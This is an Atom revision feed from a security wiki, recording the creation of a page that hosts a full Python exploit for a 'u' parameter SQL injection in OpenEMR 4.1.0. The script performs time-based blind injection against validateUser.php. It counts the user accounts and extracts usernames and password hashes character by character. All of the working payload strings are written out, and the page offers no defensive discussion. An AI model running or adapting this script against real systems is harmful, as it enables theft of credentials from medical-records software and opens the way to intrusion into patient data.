https://pwnwiki.com/index.php?action=history&feed=atom&title=OpenEMR_4.1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
OpenEMR 4.1.0 SQL注入漏洞 - Revision history
2026-04-20T23:35:46Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=OpenEMR_4.1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1295&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link..."
2021-04-09T07:52:04Z
<p>Created page with "==EXP== <pre> # Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection<br />
# Date: 2021-04-03<br />
# Exploit Author: Michael Ikua<br />
# Vendor Homepage: https://www.open-emr.org/<br />
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip<br />
# Version: 4.1.0<br />
# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/<br />
<br />
#!/usr/bin/env python3<br />
<br />
import requests<br />
import string<br />
import sys<br />
<br />
print("""<br />
____ ________ _______ __ __ ___ ____ <br />
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\<br />
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /<br />
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / <br />
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ <br />
/_/<br />
____ ___ __ _____ ____ __ _ <br />
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_) <br />
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / / <br />
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / <br />
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike <br />
""")<br />
<br />
all = string.printable<br />
# edit url to point to your openemr instance<br />
url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" <br />
<br />
def extract_users_num():<br />
print("[+] Finding number of users...")<br />
for n in range(1,100):<br />
payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''<br />
r = requests.get(url+payload)<br />
if r.elapsed.total_seconds() > 3:<br />
user_length = n<br />
break<br />
print("[+] Found number of users: " + str(user_length))<br />
return user_length<br />
<br />
def extract_users():<br />
users = extract_users_num()<br />
print("[+] Extracting username and password hash...")<br />
output = []<br />
for n in range(1,1000):<br />
payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''<br />
#print(payload)<br />
r = requests.get(url+payload)<br />
#print(r.request.url)<br />
if r.elapsed.total_seconds() > 3:<br />
length = n<br />
break<br />
for i in range(1,length+1):<br />
for char in all:<br />
payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''<br />
#print(payload)<br />
r = requests.get(url+payload)<br />
#print(r.request.url)<br />
if r.elapsed.total_seconds() > 3:<br />
output.append(char)<br />
if char == ",":<br />
print("")<br />
continue<br />
print(char, end='', flush=True)<br />
<br />
<br />
try:<br />
extract_users()<br />
except KeyboardInterrupt:<br />
print("")<br />
print("[+] Exiting...")<br />
sys.exit()<br />
</pre></div>
Pwnwiki